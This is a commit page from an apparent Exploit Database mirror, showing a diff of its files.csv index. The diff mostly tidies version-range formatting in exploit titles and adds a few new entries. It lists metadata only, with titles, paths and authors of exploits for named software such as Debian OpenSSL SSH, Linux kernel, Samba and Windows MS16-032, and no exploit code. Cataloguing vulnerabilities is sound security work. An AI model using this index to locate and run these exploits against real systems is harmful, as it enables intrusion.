bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2016-09-24

Browse source 
5 new exploits

EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion
EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion

WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection
WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)

Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)
Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)

Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)

Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)
Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)

Adobe Acrobat Reader 7<9 - U3D Buffer Overflow
Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow

Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)

Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)
Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)

Adobe Flash - Crash When Freeing Memory After AVC decoding

Adobe Flash - Video Decompression Memory Corruption

Linux - SELinux W+X Protection Bypass via AIO

Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation

Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation

Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service
Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service

Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities
Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities

Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass
Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass

Microsoft Excel 95<2004 - Malformed Graphic File Code Execution
Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution

Git-1.9.5 - ssh-agent.exe Buffer Overflow
Git 1.9.5 - ssh-agent.exe Buffer Overflow

Skybox Platform <=7.0.611 - Multiple Vulnerabilities
Skybox Platform <= 7.0.611 - Multiple Vulnerabilities

SOLIDserver <=5.0.4 - Local File Inclusion
SOLIDserver <= 5.0.4 - Local File Inclusion

WordPress Plugin DZS Videogallery <=8.60 - Multiple Vulnerabilities
WordPress Plugin DZS Videogallery <= 8.60 - Multiple Vulnerabilities

Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)

Microsoft Windows 7<10 / Server 2008-2012 (x32/x64) - Privilege Escalation (MS16-032) (C#)
Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (C#)

Microsoft Windows 7<10 / 2008<2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
Microsoft Windows 7 < 10 / 2008 < 2012 (x86/x64) - Secondary Logon Handle Privilege Escalation (MS16-032)
This commit is contained in:
Offensive Security 2016-09-24 05:05:07 +00:00
parent 12047d93f1
commit 102574cb3e
6 changed files with 179 additions and 21 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

47
files.csv
View file

@ -3765,7 +3765,7 @@ id,file,description,date,author,platform,type,port
4109,platforms/windows/remote/4109.html,"NCTAudioStudio2 - ActiveX DLL 2.6.1.148 CreateFile() Insecure Method",2007-06-26,shinnai,windows,remote,0
4110,platforms/windows/remote/4110.html,"Avaxswf.dll 1.0.0.1 from Avax Vector - ActiveX Arbitrary Data Write",2007-06-26,callAX,windows,remote,0
4111,platforms/php/webapps/4111.txt,"PHPSiteBackup 0.1 - (pcltar.lib.php) Remote File Inclusion",2007-06-26,GoLd_M,php,webapps,0
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1<= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
4112,platforms/php/webapps/4112.txt,"EVA-Web 1.1 <= 2.2 - (index.php3) Remote File Inclusion",2007-06-26,g00ns,php,webapps,0
4113,platforms/php/webapps/4113.pl,"WordPress 2.2 - (wp-app.php) Arbitrary File Upload",2007-06-26,"Alexander Concha",php,webapps,0
4114,platforms/php/webapps/4114.txt,"Elkagroup Image Gallery 1.0 - SQL Injection",2007-06-26,t0pP8uZz,php,webapps,0
4115,platforms/php/webapps/4115.txt,"QuickTalk forum 1.3 - 'lang' Local File Inclusion",2007-06-27,Katatafish,php,webapps,0
@ -4769,7 +4769,7 @@ id,file,description,date,author,platform,type,port
5124,platforms/php/webapps/5124.txt,"freePHPgallery 0.6 - Cookie Local File Inclusion",2008-02-14,MhZ91,php,webapps,0
5125,platforms/php/webapps/5125.txt,"PHP Live! 3.2.2 - (questid) SQL Injection (1)",2008-02-14,Xar,php,webapps,0
5126,platforms/php/webapps/5126.txt,"WordPress Plugin Simple Forum 2.0 < 2.1 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10-1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5127,platforms/php/webapps/5127.txt,"WordPress Plugin Simple Forum 1.10 < 1.11 - SQL Injection",2008-02-15,S@BUN,php,webapps,0
5128,platforms/php/webapps/5128.txt,"Mambo Component Quran 1.1 - (surano) SQL Injection",2008-02-15,Don,php,webapps,0
5129,platforms/php/webapps/5129.txt,"TRUC 0.11.0 - 'download.php' Remote File Disclosure",2008-02-16,GoLd_M,php,webapps,0
5130,platforms/php/webapps/5130.txt,"AuraCMS 1.62 - Multiple SQL Injections",2008-02-16,NTOS-Team,php,webapps,0
@ -5252,7 +5252,7 @@ id,file,description,date,author,platform,type,port
5619,platforms/windows/remote/5619.html,"Microsoft Internet Explorer - (Print Table of Links) Cross-Zone Scripting (PoC)",2008-05-14,"Aviv Raff",windows,remote,0
5620,platforms/php/webapps/5620.txt,"rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities",2008-05-14,e.wiZz!,php,webapps,0
5621,platforms/php/webapps/5621.txt,"Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion",2008-05-14,HaCkeR_EgY,php,webapps,0
5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
5622,platforms/linux/remote/5622.txt,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Perl)",2008-05-15,"Markus Mueller",linux,remote,22
5623,platforms/php/webapps/5623.txt,"Kostenloses Linkmanagementscript - SQL Injection",2008-05-15,"Virangar Security",php,webapps,0
5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0
5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Privilege Escalation",2008-05-15,"Alex Hernandez",windows,local,0
@ -5262,7 +5262,7 @@ id,file,description,date,author,platform,type,port
5629,platforms/php/webapps/5629.txt,"Web Slider 0.6 - Insecure Cookie/Authentication Handling",2008-05-15,t0pP8uZz,php,webapps,0
5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 - Insecure Cookie Handling",2008-05-15,t0pP8uZz,php,webapps,0
5631,platforms/php/webapps/5631.txt,"IMGallery 2.5 - Multiple SQL Injections",2008-05-15,cOndemned,php,webapps,0
5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
5632,platforms/linux/remote/5632.rb,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Ruby)",2008-05-16,L4teral,linux,remote,22
5633,platforms/asp/webapps/5633.pl,"StanWeb.CMS - (default.asp id) SQL Injection",2008-05-16,JosS,asp,webapps,0
5634,platforms/php/webapps/5634.htm,"Zomplog 3.8.2 - (newuser.php) Arbitrary Add Admin",2008-05-16,ArxWolf,php,webapps,0
5635,platforms/php/webapps/5635.pl,"Archangel Weblog 0.90.02 - (post_id) SQL Injection",2008-05-16,Stack,php,webapps,0
@ -5349,7 +5349,7 @@ id,file,description,date,author,platform,type,port
5717,platforms/asp/webapps/5717.txt,"I-Pos Internet Pay Online Store 1.3 Beta - SQL Injection",2008-06-01,KnocKout,asp,webapps,0
5718,platforms/windows/dos/5718.pl,"SecurityGateway 1.0.1 - 'Username' Remote Buffer Overflow (PoC)",2008-06-01,securfrog,windows,dos,0
5719,platforms/php/webapps/5719.pl,"Joomla! Component JooBB 0.5.9 - Blind SQL Injection",2008-06-01,His0k4,php,webapps,0
5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1<= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
5720,platforms/linux/remote/5720.py,"Debian and Derivatives OpenSSL 0.9.8c-1 <= 0.9.8g-9 - Predictable PRNG Brute Force SSH Exploit (Python)",2008-06-01,"WarCat team",linux,remote,22
5721,platforms/php/webapps/5721.pl,"Joomla! Component acctexp 0.12.x - Blind SQL Injection",2008-06-02,His0k4,php,webapps,0
5722,platforms/php/webapps/5722.txt,"Booby 1.0.1 - Multiple Remote File Inclusion",2008-06-02,HaiHui,php,webapps,0
5723,platforms/php/webapps/5723.txt,"Joomla! Component equotes 0.9.4 - SQL Injection",2008-06-02,His0k4,php,webapps,0
@ -8947,7 +8947,7 @@ id,file,description,date,author,platform,type,port
9476,platforms/windows/local/9476.py,"VUPlayer 2.49 - '.m3u' Universal Buffer Overflow",2009-08-18,mr_me,windows,local,0
9477,platforms/android/local/9477.txt,"Linux Kernel 2.x (Android) - 'sock_sendpage()' Privilege Escalation",2009-08-18,Zinx,android,local,0
9478,platforms/windows/dos/9478.pl,"HTTP SERVER (httpsv) 1.6.2 - (GET 404) Remote Denial of Service",2007-06-21,Prili,windows,dos,80
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4<11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
9479,platforms/linux/local/9479.c,"Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)",2009-08-24,"INetCop Security",linux,local,0
9480,platforms/windows/dos/9480.html,"GDivX Zenith Player AviFixer Class - (fix.dll 1.0.0.1) Buffer Overflow (PoC)",2007-05-09,rgod,windows,dos,0
9481,platforms/php/webapps/9481.txt,"Moa Gallery 1.1.0 - (gallery_id) SQL Injection",2009-08-24,Mr.tro0oqy,php,webapps,0
9482,platforms/php/webapps/9482.txt,"Arcade Trade Script 1.0b - (Authentication Bypass) Insecure Cookie Handling",2009-08-24,Mr.tro0oqy,php,webapps,0
@ -9238,7 +9238,7 @@ id,file,description,date,author,platform,type,port
9841,platforms/asp/webapps/9841.txt,"BPHolidayLettings 1.0 - Blind SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - '.blend' Command Injection",2009-11-05,"Core Security",multiple,remote,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1<2.4.37 / 2.6.1<2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1 < 2.4.37 / 2.6.1 < 2.6.32-rc5 - 'pipe.c' Privilege Escalation (3)",2009-11-05,"Matthew Bergin",linux,local,0
9845,platforms/osx/dos/9845.c,"Apple Mac OSX 10.5.6/10.5.7 - ptrace mutex Denial of Service",2009-11-05,prdelka,osx,dos,0
9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
@ -9256,7 +9256,7 @@ id,file,description,date,author,platform,type,port
9861,platforms/unix/webapps/9861.rb,"Nagios3 - statuswml.cgi Command Injection (Metasploit)",2009-10-30,"H D Moore",unix,webapps,0
9862,platforms/hardware/remote/9862.txt,"3Com OfficeConnect - Code Execution",2009-10-19,"Andrea Fabizi",hardware,remote,0
9863,platforms/php/webapps/9863.txt,"Achievo 1.3.4 - Cross-Site Scripting",2009-10-14,"Ryan Dewhurst",php,webapps,0
9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7<9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0
9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7 < 9 - U3D Buffer Overflow",2009-10-27,"Felipe Andres Manzano",windows,local,0
9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 - Buffer Overflow",2009-10-29,Dr_IDE,windows,local,0
9867,platforms/php/webapps/9867.txt,"Amiro.CMS 5.4.0.0 - folder Disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0
9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file Denial of Service",2009-10-27,Dr_IDE,windows,dos,0
@ -9332,7 +9332,7 @@ id,file,description,date,author,platform,type,port
9947,platforms/windows/remote/9947.rb,"Mozilla Suite/Firefox < 1.0.5 - compareTo Code Execution (Metasploit)",2005-07-13,"H D Moore",windows,remote,0
9948,platforms/multiple/remote/9948.rb,"Sun Java Runtime and Development Kit 6 Update 10 - Calendar Deserialization Exploit (Metasploit)",2008-12-03,sf,multiple,remote,0
9949,platforms/multiple/remote/9949.rb,"Mozilla Firefox 3.5 - escape Memory Corruption (Metasploit)",2006-07-14,"H D Moore",multiple,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21-3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
9950,platforms/linux/remote/9950.rb,"Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit)",2007-05-14,"Adriano Lima",linux,remote,0
9951,platforms/multiple/remote/9951.rb,"Squid 2.5.x / 3.x - NTLM Buffer Overflow (Metasploit)",2004-06-08,skape,multiple,remote,3129
9952,platforms/linux/remote/9952.rb,"Poptop < 1.1.3-b3 / 1.1.3-20030409 - Negative Read Overflow (Metasploit)",2003-04-09,spoonm,linux,remote,1723
9953,platforms/linux/remote/9953.rb,"MySQL 6.0 yaSSL 1.7.5 - Hello Message Buffer Overflow (Metasploit)",2008-01-04,MC,linux,remote,3306
@ -16316,7 +16316,7 @@ id,file,description,date,author,platform,type,port
18843,platforms/php/webapps/18843.txt,"myre real estate mobile 2012/2 - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0
18844,platforms/php/webapps/18844.txt,"myCare2x CMS - Multiple Vulnerabilities",2012-05-07,Vulnerability-Lab,php,webapps,0
18845,platforms/php/webapps/18845.txt,"PHP Agenda 2.2.8 - SQL Injection",2012-05-07,loneferret,php,webapps,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8<= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
18847,platforms/windows/remote/18847.rb,"Mozilla Firefox 7 / 8 <= 8.0.1 - nsSVGValue Out-of-Bounds Access (Metasploit)",2012-05-09,Metasploit,windows,remote,0
18850,platforms/php/webapps/18850.txt,"X7 Chat 2.0.5.1 - Cross-Site Request Forgery (Add Admin)",2012-05-09,DennSpec,php,webapps,0
18851,platforms/windows/dos/18851.py,"Guitar Pro 6.1.1 r10791 - '.gpx' Crash (PoC)",2012-05-09,condis,windows,dos,0
18852,platforms/windows/dos/18852.txt,"DecisionTools SharpGrid - ActiveX Control Remote Code Execution",2012-05-09,"Francis Provencher",windows,dos,0
@ -18317,6 +18317,7 @@ id,file,description,date,author,platform,type,port
21012,platforms/multiple/dos/21012.c,"ID Software Quake 1.9 - Denial of Service",2001-07-17,"Andy Gavin",multiple,dos,0
21014,platforms/linux/local/21014.c,"Slackware 7.0/7.1/8.0 - Manual Page Cache File Creation",2001-07-17,josh,linux,local,0
21015,platforms/hardware/remote/21015.pl,"Check Point Firewall-1 4 Securemote - Network Information Leak",2001-07-17,"Haroon Meer & Roelof Temmingh",hardware,remote,0
40421,platforms/multiple/dos/40421.txt,"Adobe Flash - Crash When Freeing Memory After AVC decoding",2016-09-23,"Google Security Research",multiple,dos,0
21016,platforms/windows/dos/21016.c,"ID Software Quake 3 - 'smurf attack' Denial of Service",2001-07-17,"Andy Gavin",windows,dos,0
21019,platforms/linux/remote/21019.txt,"Horde 1.2.x/2.1.3 and Imp 2.2.x/3.1.2 - File Disclosure",2001-07-13,"Caldera Open Linux",linux,remote,0
21020,platforms/multiple/local/21020.c,"NetWin DMail 2.x / SurgeFTP 1.0/2.0 - Weak Password Encryption",2001-07-20,byterage,multiple,local,0
@ -18329,6 +18330,7 @@ id,file,description,date,author,platform,type,port
21027,platforms/multiple/remote/21027.txt,"Sambar Server 4.x/5.0 - Insecure Default Password Protection",2001-07-25,3APA3A,multiple,remote,0
21028,platforms/hardware/dos/21028.pl,"Cisco IOS 12 - UDP Denial of Service",2001-07-25,blackangels,hardware,dos,0
21029,platforms/multiple/remote/21029.pl,"Softek MailMarshal 4 / Trend Micro ScanMail 1.0 - SMTP Attachment Protection Bypass",2001-07-25,"Aidan O'Kelly",multiple,remote,0
40420,platforms/multiple/dos/40420.txt,"Adobe Flash - Video Decompression Memory Corruption",2016-09-23,"Google Security Research",multiple,dos,0
21030,platforms/windows/remote/21030.txt,"SnapStream Personal Video Station 1.2 a - PVS Directory Traversal",2001-07-26,john@interrorem.com,windows,remote,0
21032,platforms/hardware/webapps/21032.txt,"Conceptronic Grab'n'Go Network Storage - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
21033,platforms/hardware/webapps/21033.txt,"Sitecom Home Storage Center - Directory Traversal",2012-09-03,"Mattijs van Ommeren",hardware,webapps,0
@ -18393,6 +18395,7 @@ id,file,description,date,author,platform,type,port
21096,platforms/windows/local/21096.txt,"Outlook Express 6 - Attachment Security Bypass",2001-08-30,http-equiv,windows,local,0
21097,platforms/solaris/remote/21097.txt,"Solaris 2.x/7.0/8 lpd - Remote Command Execution",2001-08-31,ron1n,solaris,remote,0
21098,platforms/hp-ux/local/21098.c,"HP-UX 11.0 SWVerify - Buffer Overflow",2001-09-03,foo,hp-ux,local,0
40419,platforms/linux/dos/40419.c,"Linux - SELinux W+X Protection Bypass via AIO",2016-09-23,"Google Security Research",linux,dos,0
21099,platforms/windows/dos/21099.c,"Microsoft Windows 2000 - RunAs Service Denial of Service",2001-12-11,Camisade,windows,dos,0
21100,platforms/multiple/remote/21100.pl,"Cisco Secure IDS 2.0/3.0 / Snort 1.x / ISS RealSecure 5/6 / NFR 5.0 - Encoded IIS Attack Detection Evasion",2001-09-05,blackangels,multiple,remote,0
21101,platforms/unix/local/21101.sh,"Merit AAA RADIUS Server 3.8 - rlmadmin Symbolic Link",2001-09-07,"Digital Shadow",unix,local,0
@ -18438,6 +18441,7 @@ id,file,description,date,author,platform,type,port
21141,platforms/linux/dos/21141.txt,"Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service",2001-11-05,"Aiden ORawe",linux,dos,0
21142,platforms/windows/remote/21142.pl,"Ipswitch WS_FTP Server 1.0.x/2.0.x - 'STAT' Buffer Overflow",2001-11-05,andreas,windows,remote,0
21143,platforms/windows/dos/21143.pl,"Raptor Firewall 4.0/5.0/6.0.x - Zero Length UDP Packet Resource Consumption",2001-06-21,"Max Moser",windows,dos,0
40418,platforms/windows/local/40418.txt,"Zortam Mp3 Media Studio 21.15 - Insecure File Permissions Privilege Escalation",2016-09-23,Tulpa,windows,local,0
21144,platforms/windows/remote/21144.txt,"Microsoft Internet Explorer 5/6 - Cookie Disclosure/Modification",2001-11-09,"Jouko Pynnonen",windows,remote,0
21145,platforms/multiple/remote/21145.nasl,"IBM HTTP Server 1.3.x - Source Code Disclosure",2001-11-08,"Felix Huber",multiple,remote,0
21150,platforms/unix/local/21150.c,"Rational ClearCase 3.2/4.x - DB Loader TERM Environment Variable Buffer Overflow",2001-11-09,virtualcat,unix,local,0
@ -18506,6 +18510,7 @@ id,file,description,date,author,platform,type,port
21212,platforms/multiple/remote/21212.txt,"Cacheflow CacheOS 3.1/4.0 Web Administration - Arbitrary Cached Page Code Leakage",2002-01-08,"Bjorn Djupvik",multiple,remote,0
21213,platforms/multiple/dos/21213.txt,"Snort 1.8.3 - ICMP Denial of Service",2002-01-10,Sinbad,multiple,dos,0
21214,platforms/windows/remote/21214.c,"SapporoWorks Black JumboDog 2.6.4/2.6.5 - HTTP Proxy Buffer Overflow",2002-01-01,UNYUN,windows,remote,0
40417,platforms/windows/local/40417.txt,"Wise Care 365 4.27 / Wise Disk Cleaner 9.29 - Unquoted Service Path Privilege Escalation",2016-09-23,Tulpa,windows,local,0
21215,platforms/unix/remote/21215.c,"FreeWnn 1.1 0 - jserver JS_MKDIR MetaCharacter Command Execution",2002-01-11,UNYUN,unix,remote,0
21216,platforms/linux/local/21216.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (1)",2002-01-13,anonymous,linux,local,0
21217,platforms/linux/local/21217.sh,"CDRDAO 1.1.x - Home Directory Configuration File Symbolic Link (2)",2002-01-13,atomi,linux,local,0
@ -18764,7 +18769,7 @@ id,file,description,date,author,platform,type,port
21478,platforms/php/webapps/21478.txt,"OpenBB 1.0 - Unauthorized Moderator Access",2002-05-24,frog,php,webapps,0
21479,platforms/php/webapps/21479.txt,"OpenBB 1.0.0 RC3 - Cross-Site Scripting",2002-05-24,frog,php,webapps,0
21480,platforms/cgi/webapps/21480.txt,"GNU Mailman 2.0.x - Admin Login Cross-Site Scripting",2002-05-20,office,cgi,webapps,0
21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1<4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0
21481,platforms/windows/dos/21481.txt,"Microsoft MSN Messenger 1 < 4 - Malformed Invite Request Denial of Service",2002-05-24,"Beck Mr.R",windows,dos,0
21482,platforms/linux/dos/21482.txt,"MIT PGP Public Key Server 0.9.2/0.9.4 - Search String Remote Buffer Overflow",2002-05-24,Max,linux,dos,0
21483,platforms/windows/remote/21483.html,"Opera 6.0.1/6.0.2 - Arbitrary File Disclosure",2002-05-27,"GreyMagic Software",windows,remote,0
21484,platforms/windows/remote/21484.c,"Yahoo! Messenger 5.0 - Call Center Buffer Overflow",2002-05-27,bob,windows,remote,0
@ -19485,7 +19490,7 @@ id,file,description,date,author,platform,type,port
22211,platforms/php/webapps/22211.txt,"PHP-Nuke 5.x/6.0 - Avatar HTML Injection",2003-02-03,delusion,php,webapps,0
22212,platforms/linux/local/22212.txt,"QNX RTOS 2.4 - File Disclosure",2001-04-21,teknophreak,linux,local,0
22213,platforms/windows/remote/22213.txt,"Opera 7.0 - JavaScript Console Attribute Injection",2003-02-04,"GreyMagic Software",windows,remote,0
40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087_ 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
40414,platforms/php/webapps/40414.txt,"Kerio Control Unified Threat Management 9.1.0 build 1087 / 9.1.1 build 1324 - Multiple Vulnerabilities",2016-09-22,"SEC Consult",php,webapps,0
22214,platforms/windows/dos/22214.pl,"Apple QuickTime Player 7.7.2 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
22215,platforms/windows/dos/22215.txt,"Microsoft Word 2010 - Crash (PoC)",2012-10-24,coolkaveh,windows,dos,0
22217,platforms/windows/remote/22217.txt,"Opera 7 - Image Rendering HTML Injection",2003-02-04,"GreyMagic Software",windows,remote,0
@ -23911,7 +23916,7 @@ id,file,description,date,author,platform,type,port
26751,platforms/php/webapps/26751.txt,"Cars Portal 1.1 - 'index.php' Multiple SQL Injection",2005-12-06,r0t,php,webapps,0
26752,platforms/windows/local/26752.s,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (1)",2005-12-06,Endrazine,windows,local,0
26753,platforms/unix/local/26753.c,"Multiple Vendor BIOS - Keyboard Buffer Password Persistence Weakness (2)",2005-12-06,Endrazine,unix,local,0
26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0/4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
26754,platforms/hardware/dos/26754.txt,"Check Point VPN-1 SecureClient 4.0 < 4.1 - Policy Bypass",2005-12-07,"Viktor Steinmann",hardware,dos,0
26755,platforms/php/webapps/26755.txt,"Thwboard Beta 2.8 - calendar.php year Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
26756,platforms/php/webapps/26756.txt,"Thwboard Beta 2.8 - v_profile.php user Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
26757,platforms/php/webapps/26757.txt,"Thwboard Beta 2.8 - misc.php userid Parameter SQL Injection",2005-12-07,trueend5,php,webapps,0
@ -24216,7 +24221,7 @@ id,file,description,date,author,platform,type,port
27052,platforms/php/webapps/27052.txt,"427BB 2.2 - showthread.php SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27053,platforms/php/webapps/27053.txt,"Venom Board - Post.php3 Multiple SQL Injection",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27054,platforms/php/webapps/27054.txt,"427BB 2.2 - Authentication Bypass",2006-01-09,"Aliaksandr Hartsuyeu",php,webapps,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95<2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
27055,platforms/windows/dos/27055.txt,"Microsoft Excel 95 < 2004 - Malformed Graphic File Code Execution",2006-01-09,ad@heapoverflow.com,windows,dos,0
27056,platforms/linux/local/27056.pl,"Sudo 1.6.x - Environment Variable Handling Security Bypass (1)",2006-01-09,"Breno Silva Pinto",linux,local,0
27057,platforms/linux/local/27057.py,"Sudo 1.6.x - Environment Variable Handling Security Bypass (2)",2006-01-09,"Breno Silva Pinto",linux,local,0
27058,platforms/php/webapps/27058.txt,"PHP-Nuke 7.7 EV Search Module - SQL Injection",2006-01-09,Lostmon,php,webapps,0
@ -34693,7 +34698,7 @@ id,file,description,date,author,platform,type,port
38333,platforms/php/webapps/38333.txt,"phpMyRecipes - Multiple HTML Injection Vulnerabilities",2013-02-25,PDS,php,webapps,0
38334,platforms/jsp/webapps/38334.txt,"JForum - 'jforum.page' Multiple Cross-Site Scripting Vulnerabilities",2013-02-26,ZeroDayLab,jsp,webapps,0
38335,platforms/php/webapps/38335.txt,"Geeklog - Cross-Site Scripting",2013-02-27,"High-Tech Bridge",php,webapps,0
38336,platforms/windows/dos/38336.py,"Git-1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
38336,platforms/windows/dos/38336.py,"Git 1.9.5 - ssh-agent.exe Buffer Overflow",2015-09-28,hyp3rlinx,windows,dos,0
38337,platforms/ios/dos/38337.txt,"Telegram 3.2 - Input Length Handling Crash (PoC)",2015-09-28,"Mohammad Reza Espargham",ios,dos,0
38338,platforms/jsp/webapps/38338.txt,"Mango Automation 2.6.0 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,jsp,webapps,80
38339,platforms/php/webapps/38339.txt,"Centreon 2.6.1 - Multiple Vulnerabilities",2015-09-28,LiquidWorm,php,webapps,80
@ -35256,7 +35261,7 @@ id,file,description,date,author,platform,type,port
38924,platforms/php/webapps/38924.txt,"WordPress 2.0.11 - '/wp-admin/options-discussion.php' Script Cross-Site Request Forgery",2013-12-17,MustLive,php,webapps,0
